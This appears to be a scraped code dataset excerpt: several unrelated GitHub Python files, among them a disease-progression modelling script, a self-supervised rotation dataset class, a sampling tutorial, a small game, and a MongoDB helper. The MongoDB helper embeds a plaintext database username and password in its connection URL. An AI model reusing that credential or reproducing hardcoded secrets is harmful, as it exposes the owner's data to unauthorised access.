dataDfAll.loc[:, 'CDRSB':].columns.tolist()\n for b in range(len(biomks)):\n\n fig = pl.figure(5)\n fig.clf()\n for d in unqDiags:\n pl.hist(dataDfAll.loc[dataDfAll.diag == d, biomks[b]].dropna(), bins=15,\n color=plotTrajParams['diagColors'][d], label=plotTrajParams['diagLabels'][d], alpha=0.5)\n\n pl.legend(loc='west')\n pl.title(biomks[b])\n\n fig.show()\n 
os.system('mkdir -p resfiles/tad-drc')\n fig.savefig('resfiles/tad-drc/%d_%s.png' % (b, biomks[b]))\n\n\ndef main():\n\n # don't turn this on unless I add cognitive markers in the DRC dataset.\n addExtraBiomk = False\n\n np.random.seed(1)\n random.seed(1)\n pd.set_option('display.max_columns', 50)\n tinyData = args.tinyData\n\n finalDataFile = 'data_processed/tadDrc.npz'\n expName = 'tadDrc'\n\n if args.tinyData:\n finalDataFile = finalDataFile.split('.')[0] + 'Tiny.npz'\n expName = expName.split('.')[0] + 'Tiny'\n\n if addExtraBiomk:\n finalDataFile = finalDataFile.split('.')[0] + 'Cog.npz'\n expName = expName.split('.')[0] + 'Cog'\n\n regenerateData = (not os.path.isfile(finalDataFile)) or args.regData\n if regenerateData:\n prepareData(finalDataFile, tinyData, addExtraBiomk)\n # print(dada)\n\n\n\n ds = pickle.load(open(finalDataFile, 'rb'))\n dataDfAll = ds['dataDfAll']\n regParamsICV = ds['regParamsICV']\n regParamsAge = ds['regParamsAge']\n regParamsGender = ds['regParamsGender']\n regParamsDataset = ds['regParamsDataset']\n X = ds['X']\n Y = ds['Y']\n RID = np.array(ds['RID'], int)\n labels = ds['list_biomarkers']\n diag = ds['diag']\n\n outFolder = 'resfiles/'\n\n params = {}\n\n av45InListBiomk = np.array([True for x in ds['list_biomarkers'] if x.startswith('AV1451')]).any()\n if av45InListBiomk:\n nrBiomkInFuncUnits = 5\n else:\n nrBiomkInFuncUnits = 4\n\n # print('dataDfAll', dataDfAll)\n\n\n\n nrDis = 2 # nr of diseases\n params['nrDis'] = nrDis\n\n # change the order of the functional units so that the hippocampus and occipital are fitted first\n unitPermutation = [5,3,2,1,4,0]\n\n nrFuncUnits = 6\n mapBiomkToFuncUnits = np.array((unitPermutation * nrBiomkInFuncUnits))\n nrExtraBiomk = 0\n\n if addExtraBiomk:\n nrExtraBiomk = 5\n nrFuncUnits += nrExtraBiomk # add the 3 extra cog markers to a unique functional unit\n\n mapBiomkToFuncUnits = np.array((unitPermutation * nrBiomkInFuncUnits) + list(range(nrFuncUnits-nrExtraBiomk, nrFuncUnits)))\n\n # print(mapBiomkToFuncUnits)\n # print(dasdas)\n\n unitNames = [l.split(' ')[-1] for l in labels]\n unitNames = [unitNames[i] for i in unitPermutation]\n if addExtraBiomk:\n extraBiomkNames = ['ADAS13', 'CDRSB', 'RAVLT', 'MMSE', 'FAQ']\n unitNames += extraBiomkNames\n assert len(extraBiomkNames) == nrExtraBiomk\n\n nrBiomk = mapBiomkToFuncUnits.shape[0]\n biomkInFuncUnit = [0 for u in range(nrFuncUnits + 1)]\n for u in range(nrFuncUnits):\n biomkInFuncUnit[u] = np.where(mapBiomkToFuncUnits == u)[0]\n\n # if addExtraBiomk:\n # # add extra entry with other biomks to be added in the disease models\n # extraBiomkNames = ['ADAS13', 'CDRSB', 'RAVLT', 'MMSE', 'FAQ']\n # biomkInFuncUnit[nrFuncUnits] = np.array([nrBiomk-3, nrBiomk-2, nrBiomk-1])\n # else:\n\n biomkInFuncUnit[nrFuncUnits] = np.array([]) # need to leave this as empty list\n\n plotTrajParams['biomkInFuncUnit'] = biomkInFuncUnit\n plotTrajParams['labels'] = labels\n plotTrajParams['nrRowsFuncUnit'] = 3\n plotTrajParams['nrColsFuncUnit'] = 4\n plotTrajParams['colorsTrajBiomkB'] = [colorsys.hsv_to_rgb(hue, 1, 1) for hue in\n np.linspace(0, 1, num=nrBiomk, endpoint=False)]\n plotTrajParams['colorsTrajUnitsU'] = [colorsys.hsv_to_rgb(hue, 1, 1) for hue in\n np.linspace(0, 1, num=nrFuncUnits, endpoint=False)]\n plotTrajParams['nrBiomk'] = nrBiomk\n params['nrBiomk'] = nrBiomk\n\n # plotTrajParams['yNormMode'] = 'zScoreTraj'\n # plotTrajParams['yNormMode'] = 'zScoreEarlyStageTraj'\n plotTrajParams['yNormMode'] = 'unscaled'\n\n # if False, plot estimated traj. 
in separate plot from true traj.\n plotTrajParams['allTrajOverlap'] = False\n\n params['nrFuncUnitsImgOnly'] = nrFuncUnits - nrExtraBiomk\n params['unitNames'] = unitNames\n params['runIndex'] = args.runIndex\n params['nrProc'] = args.nrProc\n params['cluster'] = args.cluster\n params['plotTrajParams'] = plotTrajParams\n params['penaltyUnits'] = args.penalty\n params['penaltyDis'] = args.penalty\n params['nrFuncUnits'] = nrFuncUnits\n params['biomkInFuncUnit'] = biomkInFuncUnit\n params['mapBiomkToFuncUnits'] = mapBiomkToFuncUnits\n params['labels'] = labels\n params['nrExtraBiomk'] = nrExtraBiomk\n\n params['X'] = X\n params['Y'] = Y\n params['RID'] = RID\n # print('RID', RID)\n # print(ads)\n params['diag'] = diag\n params['plotTrajParams']['diag'] = params['diag']\n params['Xvalid'] = ds['Xvalid']\n params['Yvalid'] = ds['Yvalid']\n params['RIDvalid'] = ds['RIDvalid']\n params['diagValid'] = ds['diagValid']\n params['dataDfAll'] = dataDfAll\n params['visitIndices'] = ds['visitIndices']\n params['visitIndicesValid'] = ds['visitIndicesValid']\n\n # params['nrGlobIterUnit'] = 10 # these parameters are specific for the Joint Model of Disease (JMD)\n # params['iterParamsUnit'] = 60\n # params['nrGlobIterDis'] = 10\n # params['iterParamsDis'] = 60\n\n # by default we have no priors\n params['priors'] = None\n\n # print([params['X'][b2][subjIndCurrDis[s]] for b2 in range(params['nrBiomk'])])\n # print([params['Y'][b2][subjIndCurrDis[s]] for b2 in range(params['nrBiomk'])])\n\n for s in range(len(X[0])):\n entriesCurrSubj = [X[b][s].shape[0] > 0 for b in range(30)]\n nrEntriesPerSubj = np.sum(entriesCurrSubj)\n if nrEntriesPerSubj == 0:\n print(s, entriesCurrSubj)\n print(dadsa)\n\n print(labels)\n # print(dasda)\n\n ############# set priors for specific models ################\n\n # params['priors'] = dict(prior_length_scale_mean_ratio=0.33, # mean_length_scale = (self.maxX-self.minX)/3\n # prior_length_scale_std=1e-4, prior_sigma_mean=2,prior_sigma_std = 1e-3,\n # prior_eps_mean = 1, prior_eps_std = 1e-2)\n # params['priors'] = dict(prior_length_scale_mean_ratio=0.9, # mean_length_scale = (self.maxX-self.minX)/3\n # prior_length_scale_std=1e-4, prior_sigma_mean=3, prior_sigma_std=1e-3,\n # prior_eps_mean=0.1, prior_eps_std=1e-6)\n\n params['priorsUnitModelsMarcoModel'] = [dict(prior_length_scale_mean_ratio=0.05, # mean_length_scale = (self.maxX-self.minX)/3\n prior_length_scale_std=1e-6, prior_sigma_mean=0.5, prior_sigma_std=1e-3,\n prior_eps_mean=0.1, prior_eps_std=1e-6) for u in range(nrFuncUnits)]\n\n transitionTimePriorMean = 1 # in DPS 0-1 space, prior mean\n transitionTimePriorMin = 0.9\n transitionTimePriorMax = 1.1\n\n bPriorShape, bPriorRate = getGammShapeRateFromTranTime(\n transitionTimePriorMean, transitionTimePriorMin, transitionTimePriorMax)\n\n transitionTimePriorMeanAD = 0.1 # using months instead of years\n transitionTimePriorMinAD = 0.09\n transitionTimePriorMaxAD = 0.11\n\n bPriorShapeDisAD, bPriorRateDisAD = getGammShapeRateFromTranTime(\n transitionTimePriorMeanAD, transitionTimePriorMinAD, transitionTimePriorMaxAD)\n\n _, bPriorStdAD = getMeanStdBFromTranTime(\n transitionTimePriorMeanAD, transitionTimePriorMinAD, transitionTimePriorMaxAD)\n\n transitionTimePriorMeanPCA = 500\n transitionTimePriorMinPCA = 400\n transitionTimePriorMaxPCA = 600\n\n bPriorShapeDisPCA, bPriorRateDisPCA = getGammShapeRateFromTranTime(\n transitionTimePriorMeanPCA, transitionTimePriorMinPCA, transitionTimePriorMaxPCA)\n\n _, bPriorStdPCA = getMeanStdBFromTranTime(\n transitionTimePriorMeanPCA, 
transitionTimePriorMinPCA, transitionTimePriorMaxPCA)\n\n params['priorsDisModels'] = [0, 0]\n # priors for tAD\n params['priorsDisModels'][0] = dict(meanA=1, stdA=1e-20, meanD=0, stdD=1e-20,\n shapeB=bPriorShapeDisAD, rateB=bPriorRateDisAD, stdPerturbB=bPriorStdAD, timeShiftStd=20000)\n # priors for PCA\n params['priorsDisModels'][1] = dict(meanA=1, stdA=1e-20, meanD=0, stdD=1e-20,\n shapeB=bPriorShapeDisPCA, rateB=bPriorRateDisPCA, stdPerturbB=bPriorStdPCA, timeShiftStd=20000)\n\n # params['priorsUnitModels'] = [dict(meanA=1, stdA=1e-20, meanD=0, stdD=1e-20,\n # shapeB=2, rateB=2, timeShiftStd=20000) for d in range(nrDis)]\n params['priorsUnitModels'] = [dict(meanA=1, stdA=1e-5, meanD=0, stdD=1e-5,\n shapeB=bPriorShape, rateB=bPriorRate, timeShiftStd=20000) for u in range(nrFuncUnits-nrExtraBiomk)]\n\n if nrExtraBiomk > 0:\n params['priorsUnitModelsLinear'] = [dict(meanA=1, stdA=0.1, meanB=0, stdB=0.1, timeShiftStd=20000)\n for u in range(nrExtraBiomk)]\n params['priorsUnitModels'] += params['priorsUnitModelsLinear']\n\n\n bPriorShapeNoDKT, bPriorRateNoDKT = getGammShapeRateFromTranTime(\n transitionTimePriorMean=50, transitionTimePriorMin=40, transitionTimePriorMax=60)\n params['priorsNoDKTSigmoid'] = dict(meanA=1, stdA=1e-5, meanD=0, stdD=1e-5,\n shapeB=bPriorShapeNoDKT, rateB=bPriorRateNoDKT, timeShiftStd=20000)\n\n ######################\n\n nrBiomkDisModel = nrFuncUnits\n params['nrBiomkDisModel'] = nrBiomkDisModel\n\n if addExtraBiomk:\n params['plotTrajParams']['unitNames'] = unitNames + labels[-3:]\n else:\n params['plotTrajParams']['unitNames'] = unitNames\n\n # map which diagnoses belong to which disease\n # first disease has CTL+AD, second disease has CTL2+PCA\n params['diagsSetInDis'] = [np.array([CTL, MCI, AD, AD2]), np.array([CTL2, PCA])]\n params['disLabels'] = ['tAD', 'PCA']\n # if addExtraBiomk:\n # params['otherBiomkPerDisease'] = [[nrBiomk-3,nrBiomk-2, nrBiomk-1], []] # can also add 3 extra cognitive tests\n # else:\n # params['otherBiomkPerDisease'] = [[], []]\n\n params['binMaskSubjForEachDisD'] = [np.in1d(params['diag'],\n params['diagsSetInDis'][disNr]) for disNr in range(nrDis)]\n\n eps = 0.001\n nrXPoints = 50\n params['trueParams'] = {}\n subShiftsS = np.zeros(RID.shape[0])\n # params['trueParams']['trueSubjDysfuncScoresSU'] = np.zeros((RID.shape[0],nrFuncUnits))\n trueDysfuncXsX = np.linspace(0,1, nrXPoints)\n # params['trueParams']['trueTrajXB'] = eps * np.ones((nrXPoints, nrBiomk))\n trueTrajFromDysXB = eps * np.ones((nrXPoints, nrBiomk))\n\n trueLineSpacedDPSsX = np.linspace(-10,10, nrXPoints)\n trueTrajPredXB = eps * np.ones((nrXPoints,nrBiomk))\n trueDysTrajFromDpsXU = eps * np.ones((nrXPoints,nrBiomkDisModel))\n\n scalingBiomk2B = np.zeros((2, nrBiomk))\n scalingBiomk2B[1,:] = 1\n\n trueParamsFuncUnits = [0 for _ in range(nrFuncUnits)]\n for f in range(nrFuncUnits):\n trueParamsFuncUnits[f] = dict(xsX=trueDysfuncXsX, ysXB=trueTrajFromDysXB[:, biomkInFuncUnit[f]],\n subShiftsS=subShiftsS,\n scalingBiomk2B=scalingBiomk2B[:, biomkInFuncUnit[f]])\n\n # disease specific\n trueParamsDis = [0 for _ in range(nrDis)]\n for d in range(nrDis):\n trueParamsDis[d] = dict(xsX=trueLineSpacedDPSsX, ysXU=trueDysTrajFromDpsXU, ysXB=trueTrajPredXB,\n subShiftsS=np.zeros(np.sum(np.in1d(params['diag'],params['diagsSetInDis'][d]))),\n scalingBiomk2B=scalingBiomk2B)\n\n\n # for DKT DPMs\n params['trueParamsFuncUnits'] = trueParamsFuncUnits\n params['trueParamsDis'] = trueParamsDis\n\n # simpler non-DKT DPMs\n params['trueParams'] = dict(xsX=trueLineSpacedDPSsX, ysXU = 
trueTrajPredXB, ysXB = trueTrajPredXB,\n subShiftsS=subShiftsS, scalingBiomk2B=scalingBiomk2B)\n params['plotTrajParams']['trueParams'] = params['trueParams']\n\n print('diag', params['diag'].shape[0])\n # print(adsa)\n print('X[0]',len(params['X'][0]))\n assert params['diag'].shape[0] == len(params['X'][0])\n # assert params['diag'].shape[0] == len(params['trueParams']['subShiftsTrueMarcoFormatS'])\n # assert params['diag'].shape[0] == len(params['trueParams']['trueSubjDysfuncScoresSU'])\n\n # if args.penalty is not None:\n # if np.abs(args.penalty - int(args.penalty) < 0.00001):\n # expName = '%sPen%d' % (expName, args.penalty)\n # else:\n # expName = '%sPen%.1f' % (expName, args.penalty)\n\n # params['runPartStd'] = ['L', 'L']\n params['runPartStd'] = args.runPartStd\n params['runPartMain'] = ['R', 'I', 'I'] # [mainPart, plot, stage]\n params['masterProcess'] = args.runIndex == 0\n\n expNameDisOne = '%s' % expName\n modelNames, res = evaluationFramework.runModels(params, expName,\n args.modelToRun, runAllExpTadpoleDrc)\n\n\n if params['masterProcess']:\n printRes(modelNames, res, plotTrajParams, params)\n\n\ndef printRes(modelNames, res, plotTrajParams, params):\n #nrModels = len(modelNames)\n\n nrDis = params['nrDis']\n modelNames += ['Lin', 'Spline', 'Multivar']\n officialNames = {'JMD': 'DKT', 'Sig': 'Latent stage', 'Lin': 'Linear',\n 'Spline': 'Spline', 'Multivar': 'Multivariate'}\n\n d = 0\n\n disNrValid = 1\n disNrsValid = [disNrValid]\n\n biomkNames = res[0]['metrics']['labelsNonMri']\n\n\n resDf = pd.DataFrame(index=range(12 * len(disNrsValid)), columns=['Model'] + biomkNames)\n\n c = 0\n\n # dpmObjStd[s].plotter.plotAllBiomkDisSpace(dpmObjStd[s], params, disNr=0)\n # for disNrValid in disNrsValid:\n print('%d-%d training on dis %s validation on disease %s' % (d, disNrValid,\n params['disLabels'][0], params['disLabels'][1]))\n\n dktIndex = 0\n sigIndex = 1\n linIndex = 2\n splineIndex = 3\n multivarIndex = 4\n\n # print('##### biomk prediction ######')\n nrModels = len(officialNames)\n mseMUB = list(range(nrModels))\n mseMeanMU = list(range(nrModels))\n mseStdMU = list(range(nrModels))\n\n corrMUB = list(range(nrModels))\n corrMeanMU = list(range(nrModels))\n corrStdMU = list(range(nrModels))\n pvalsMU = list(range(nrModels))\n\n for m in range(len(res)):\n # print(res[m]['metrics'])\n # print(res[m]['metrics'][d])\n mseMUB[m] = res[m]['metrics']['dpm']['mseUB']\n mseMeanMU[m] = np.nanmean(mseMUB[m], axis=1)\n mseStdMU[m] = np.nanstd(mseMUB[m], axis=1)\n\n corrMUB[m] = res[m]['metrics']['dpm']['corrUB']\n corrMeanMU[m] = np.nanmean(corrMUB[m], axis=1)\n corrStdMU[m] = np.nanstd(corrMUB[m], axis=1)\n\n mseMUB[linIndex] = res[0]['metrics']['lin']['mseUB']\n mseMeanMU[linIndex] = np.nanmean(mseMUB[linIndex], axis=1)\n mseStdMU[linIndex] = np.nanstd(mseMUB[linIndex], axis=1)\n\n mseMUB[splineIndex] = res[0]['metrics']['spline']['mseUB']\n mseMeanMU[splineIndex] = np.nanmean(mseMUB[splineIndex], axis=1)\n mseStdMU[splineIndex] = np.nanstd(mseMUB[splineIndex], axis=1)\n\n mseMUB[multivarIndex] = res[0]['metrics']['multivar']['mseUB']\n mseMeanMU[multivarIndex] = np.nanmean(mseMUB[multivarIndex], axis=1)\n mseStdMU[multivarIndex] = np.nanstd(mseMUB[multivarIndex], axis=1)\n\n\n corrMUB[linIndex] = res[0]['metrics']['lin']['corrUB']\n corrMeanMU[linIndex] = np.nanmean(corrMUB[linIndex], axis=1)\n corrStdMU[linIndex] = np.nanstd(corrMUB[linIndex], axis=1)\n\n corrMUB[splineIndex] = res[0]['metrics']['spline']['corrUB']\n corrMeanMU[splineIndex] = np.nanmean(corrMUB[splineIndex], 
axis=1)\n corrStdMU[splineIndex] = np.nanstd(corrMUB[splineIndex], axis=1)\n\n corrMUB[multivarIndex] = res[0]['metrics']['multivar']['corrUB']\n corrMeanMU[multivarIndex] = np.nanmean(corrMUB[multivarIndex], axis=1)\n corrStdMU[multivarIndex] = np.nanstd(corrMUB[multivarIndex], axis=1)\n\n # Perform Bonferroni correction\n sigLevel = 0.05/(6*2*nrModels)\n\n print('##### mean squared error and rank correlation ######')\n resDf.iloc[c, 0] = 'Prediction Error (MSE)'\n c += 1\n modelIndxs = [dktIndex, sigIndex, multivarIndex, splineIndex, linIndex]\n\n for m in modelIndxs:\n resDf.iloc[c,0] = officialNames[modelNames[m]]\n\n for u in range(mseMeanMU[m].shape[0]):\n sigLabel = getSigLabel(mseMUB[m][u, :], mseMUB[dktIndex][u, :], sigLevel)\n resDf.iloc[c, u+1] = '%.2f +/- %.2f%s' % (mseMeanMU[m][u], mseStdMU[m][u], sigLabel)\n\n c += 1\n\n resDf.iloc[c, 0] = 'Rank Correlation (Spearman rho)'\n c += 1\n\n for m in modelIndxs:\n resDf.iloc[c, 0] = officialNames[modelNames[m]]\n # c += 1\n\n for u in range(mseMeanMU[m].shape[0]):\n sigLabel = getSigLabel(corrMUB[m][u,:], corrMUB[dktIndex][u,:], sigLevel)\n resDf.iloc[c, u+1] = '%.2f +/- %.2f%s' % (corrMeanMU[m][u], corrStdMU[m][u], sigLabel)\n\n c += 1\n\n\n print(resDf)\n resDf.to_html('drcRes.html')\n resDf.loc[:, 'Model' : 'DTI FA Temporal'].to_latex('drcRes.tex', index=False)\n\n\ndef getSigLabel(xs, xsMyModel, sigLevel):\n tstatCorrDkt, pValCorrDkt = scipy.stats.ttest_rel(xs, xsMyModel)\n\n if pValCorrDkt < sigLevel:\n sigLabel = '*'\n else:\n sigLabel = ''\n\n return sigLabel\n\ndef runAllExpTadpoleDrc(params, expName, dpmBuilder, compareTrueParamsFunc = None):\n \"\"\" runs all experiments\"\"\"\n\n res = {}\n\n params['patientID'] = AD\n params['excludeID'] = -1\n params['excludeXvalidID'] = -1\n params['excludeStaging'] = [-1]\n\n params['outFolder'] = 'resfiles/%s' % expName\n params['expName'] = expName\n\n dpmObjStd, res['std'] = evaluationFramework.runStdDPM(params,\n expName, dpmBuilder, params['runPartMain'])\n\n # dpmObjStd.plotter.plotAllBiomkDisSpace(dpmObjStd, params, disNr=0)\n\n # perform the validation against DRC data\n res['metrics'] = validateDRCBiomk(dpmObjStd, params)\n\n\n return res\n\n\n\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"razvanmarinescu/dkt","sub_path":"tadpoleDrc.py","file_name":"tadpoleDrc.py","file_ext":"py","file_size_in_byte":21152,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"44380707854","text":"import torch\nfrom PIL import Image\n\nfrom .registry import DATASETS\nfrom .base import BaseDataset\n\n\ndef rotate(img):\n \"\"\"Rotate input image with 0, 90, 180, and 270 degrees.\n\n Args:\n img (Tensor): input image of shape (C, H, W).\n\n Returns:\n list[Tensor]: A list of four rotated images.\n \"\"\"\n return [\n img,\n torch.flip(img.transpose(1, 2), [1]),\n torch.flip(img, [1, 2]),\n torch.flip(img, [1]).transpose(1, 2)\n ]\n\n\n@DATASETS.register_module\nclass RotationPredDataset(BaseDataset):\n \"\"\"Dataset for rotation prediction.\n \"\"\"\n\n def __init__(self, data_source, pipeline):\n super(RotationPredDataset, self).__init__(data_source, pipeline)\n\n def __getitem__(self, idx):\n img = self.data_source.get_sample(idx)\n assert isinstance(img, Image.Image), \\\n 'The output from the data source must be an Image, got: {}. 
\\\n            Please ensure that the list file does not contain labels.'.format(\n                type(img))\n        img = self.pipeline(img)\n        img = torch.stack(rotate(img), dim=0)\n        rotation_labels = torch.LongTensor([0, 1, 2, 3])\n        return dict(img=img, rot_label=rotation_labels)\n\n    def evaluate(self, scores, keyword, logger=None):\n        raise NotImplementedError\n","repo_name":"WXinlong/DenseCL","sub_path":"openselfsup/datasets/rotation_pred.py","file_name":"rotation_pred.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":523,"dataset":"github-code","pt":"48"}
{"seq_id":"31539002936","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\nwnba = pd.read_csv('wnba.csv')\r\n\r\n# As we increase the sample size, the sample means vary less around the population mean,\r\n# and the chances of getting an unrepresentative sample decrease.\r\n# The more representative a sample is, the smaller the sampling error.\r\nsample_means = []\r\nfor i in range(100):\r\n    sample = wnba['PTS'].sample(100, random_state=i)\r\n    sample_mean = sample.mean()\r\n    sample_means.append(sample_mean)\r\n\r\nparameter = wnba['PTS'].mean()\r\n\r\n# We can see how sample means tend to vary less around the population mean as we increase the sample size.\r\nplt.scatter(range(1, 101), sample_means)\r\nplt.axhline(parameter, label='Parameter mean')\r\nplt.yticks(ticks=list(range(125, 325, 25)))\r\nplt.legend()\r\nplt.show()\r\n\r\n# Conclusions:\r\n# Simple random sampling isn't a reliable sampling method when the sample size is small.\r\n# When we do simple random sampling, we should try to get a sample that is as large as possible.\r\n","repo_name":"legendyen/SungJen_Python_Projects","sub_path":"DQ/Probability and Statistics with Python/2.simple_random _sampling.py","file_name":"2.simple_random _sampling.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"8000502254","text":"rock = '''\r\n _______\r\n---'   ____)\r\n      (_____)\r\n      (_____)\r\n      (____)\r\n---.__(___)\r\n'''\r\n\r\npaper = '''\r\n _______\r\n---'   ____)____\r\n          ______)\r\n          _______)\r\n         _______)\r\n---.__________)\r\n'''\r\n\r\nscissors = '''\r\n _______\r\n---'   ____)____\r\n       ______)\r\n    __________)\r\n      (____)\r\n---.__(___)\r\n'''\r\n\r\n\r\ngame_images = [rock, paper, scissors]\r\nchoice = int(input(\"What do you choose? 
Type 0 for Rock, 1 for Paper or 2 for Scissors.\\n\"))\r\n\r\nif choice >= 3 or choice < 0:\r\n print(\"You typed an invalid number, you lose!\")\r\nelse:\r\n print(game_images[choice])\r\n import random\r\n pc_choice = random.randint(0,2)\r\n print(f\"Computer chose:\\n{game_images[pc_choice]}\")\r\n \r\n if choice == 0 and pc_choice == 2:\r\n print(\"You Win!\")\r\n elif pc_choice == 0 and choice == 2:\r\n print (\"You lose!\")\r\n elif choice > pc_choice:\r\n print(\"You Win!\")\r\n elif pc_choice > choice:\r\n print(\"You lose!\")\r\n elif choice == pc_choice:\r\n print(\"Its a draw\")\r\n","repo_name":"Mayank-2011/python-projects","sub_path":"Rock_paper_scissors.py","file_name":"Rock_paper_scissors.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73906143826","text":"T = int(input())\n\ndef calc(p1, p2, m1, m2):\n if m1 != m2:\n a = m1-m2\n b = p1*m2 - p2*m1\n c = m1*(p2**2) - m2*(p1**2)\n result1 = (-b + (b ** 2 - a * c) ** (1 / 2)) / a\n result2 = (-b - (b ** 2 - a * c) ** (1 / 2)) / a\n if (result1 > p1 and result1 < p2):\n result = result1\n else:\n result = result2\n else:\n result = (p1+p2)/2\n return result\n\n\nfor i in range(T):\n N = int(input())\n inp = input().split()\n pos = []\n mass = []\n result = []\n for j in range(N):\n pos.append(int(inp[j]))\n mass.append(int(inp[N+j]))\n for k in range(N-1):\n res = calc(pos[k], pos[k+1], mass[k], mass[k+1])\n result.append(res)\n print(\"#{}\".format(i+1), end = \" \")\n for r in result:\n print(\"{:.10f}\".format(r), end = \" \")\n print(\"\")\n","repo_name":"Kangsan-Jeon/AlgorithmTrain","sub_path":"SW_ExpertAcademy/1245_균형점.py","file_name":"1245_균형점.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69812487187","text":"import pymongo\nfrom bson.json_util import dumps\nimport json\nfrom pymongo import MongoClient\nfrom .assignment import Assignment\nurl = \"mongodb://Archie96:hannah10@mycroft-assignment-shard-00-00-1rt5b.mongodb.net:27017,mycroft-assignment-shard-00-01-1rt5b.mongodb.net:27017,mycroft-assignment-shard-00-02-1rt5b.mongodb.net:27017/test?ssl=true&replicaSet=Mycroft-Assignment-shard-0&authSource=admin&retryWrites=true\"\nassignments_collection = \"Assignments\"\nclass db_helper(object):\n \n def __init__(self, studentID):\n #setup connection to database\n self.client = MongoClient(url)\n #set which student's collection of data we will be working with\n self._db = self.client[studentID]\n self._assignment_collection = None\n\n @property\n def db(self):\n return self._db\n\n @db.setter\n def db(self, value):\n #setter for db\n self._db = value\n\n @property\n def assignment_collection(self):\n return self._assignment_collection\n\n @assignment_collection.setter\n def assignment_collection(self, value):\n self._assignment_collection = value\n\n def pushAssignment(self, newAssignment):\n\n assignment = {\"date_issued\": newAssignment.date_issued,\n \"module_id\": newAssignment.module_id,\n \"due_date\": newAssignment.due_date,\n \"total_percentage\": newAssignment.total_per,\n \"accumulated_percentage\": newAssignment.acc_per,\n \"assignment_type\": newAssignment.assignment_type,\n \"name\": newAssignment.name \n }\n\n self.assignment_collection = self.db[assignments_collection]\n\n #checks to see if assignment name is already in the module collection, if so return\n #without pushing anything\n\n for document in 
self.assignment_collection.find():\n if newAssignment.name == self.parseAssignment(document).name:\n print(\"Assignment name already exists\")\n return 0\n\n print(\"yurting\") \n post_id = self.assignment_collection.insert_one(assignment).inserted_id\n return 1\n \n def getAllAssignments(self):\n self.assignment_collection = self.db[assignments_collection]\n assignments = []\n \n for assignment_bson in self.assignment_collection.find({}):\n assignment = self.parseAssignment(assignment_bson)\n if not assignment:\n return None\n assignments.append(assignment)\n if len(assignments) == 0:\n return None\n return assignments\n\n def getAssignment(self, assignment_name):\n self.assignment_collection = self.db[assignments_collection]\n assignment_uni = self.assignment_collection.find_one({\"name\": assignment_name})\n if not assignment_uni:\n print(\"Error - Could not find an assignment with that name\")\n return\n\n return self.parseAssignment(assignment_uni)\n \n def getAllModuleAssignments(self, module_id):\n all_assignments = self.getAllAssignments()\n module_assignments = []\n\n for assignment in all_assignments:\n if module_id == assignment.module_id:\n module_assignments.append(assignment)\n \n return module_assignments\n\n def parseAssignment(self, assignment_Bson):\n #dumps the BSON dictionary into a usable JSON format\n assignment_json = dumps(assignment_Bson)\n #formats the JSON in a way so that we can extract members of the JSON object\n #Assigns the members of this object to an assignment class which is then returned\n j = json.loads(assignment_json)\n return Assignment(j['date_issued'], j['module_id'], j['due_date'], j['total_percentage'],\n j['accumulated_percentage'], j['assignment_type'], j['name'])\n\n #gets the number of assignments for a given module\n def assignmentCount(self):\n self.assignment_collection = self.db[assignments_collection]\n return self.assignment_collection.count()\n \n #These update functions could possibly be squished into one function, taking two parameters, the name of the field and the new value\n #Might look into refining it later down the line\n\n #update assignment due date\n def updateAssignmentDueDate(self, assignment_name, new_due_date):\n self.assignment_collection = self.db[assignments_collection]\n try:\n self.assignment_collection.update_one(\n {\"name\":assignment_name},\n { \"$set\":\n {\n \"due_date\":new_due_date\n }\n }, upsert=False)\n except pymongo.errors.PyMongoError as e:\n print(e) \n\n #update total percentage for assignment\n def updateAssignmentTotalPer(self, assignment_name, new_total_per):\n self.assignment_collection = self.db[assignments_collection]\n try:\n self.assignment_collection.update_one(\n {\"name\":assignment_name},\n { \"$set\":\n {\n \"total_percentage\":new_total_per\n }\n }, upsert=False)\n except pymongo.errors.PyMongoError as e:\n print(e)\n\n #update accumulated percentage\n def updateAssignmentAccPer(self, assignment_name, new_accumulated_per):\n self.assignment_collection = self.db[assignments_collection]\n try:\n self.assignment_collection.update_one(\n {\"name\":assignment_name},\n { \"$set\":\n {\n \"accumulated_percentage\":new_accumulated_per\n }\n }, upsert=False)\n except pymongo.errors.PyMongoError as e:\n print(e) \n\n #update assignment type\n def updateAssignmentType(self, assignment_name, new_assignment_type):\n self.assignment_collection = self.db[assignments_collection]\n try:\n self.assignment_collection.update_one(\n {\"name\":assignment_name},\n { \"$set\":\n {\n 
\"assignment_type\":new_assignment_type\n }\n }, upsert=False)\n except pymongo.errors.PyMongoError as e:\n print(e) \n\n #update assignment name\n def updateAssignmentName(self, assignment_name, new_assignment_name):\n self.assignment_collection = self.db[assignments_collection]\n try:\n self.assignment_collection.update_one(\n {\"name\":assignment_name},\n { \"$set\":\n {\n \"name\":new_assignment_name\n }\n }, upsert=False)\n except pymongo.errors.PyMongoError as e:\n print(e) \n\n #remove a given assignment\n def removeAssignment(self, assignment_name):\n self.assignment_collection = self.db[assignments_collection]\n self.assignment_collection.remove({\"name\":assignment_name})\n\n #def removeModule(self, module_id):\n\n\n","repo_name":"BrianArch96/Mycroft-assignment","sub_path":"db/db_helper.py","file_name":"db_helper.py","file_ext":"py","file_size_in_byte":7115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"212029731","text":"#Important Modules\nfrom flask import Flask,render_template, url_for ,flash , redirect\n#from forms import RegistrationForm, LoginForm\nfrom sklearn.externals import joblib\nfrom flask import request\nimport numpy as np\nimport tensorflow\n#from keras.layers import Conv2D, MaxPooling2D, Dense, Dropout, Input, Flatten, SeparableConv2D\n#from flask_sqlalchemy import SQLAlchemy\n#from model_class import DiabetesCheck, CancerCheck\n\n#from tensorflow.keras.models import Sequential\n#from tensorflow.keras.layers import Conv2D, MaxPooling2D, Dense, Dropout, Input, Flatten, SeparableConv2D\n#from tensorflow.keras.layers import GlobalMaxPooling2D, 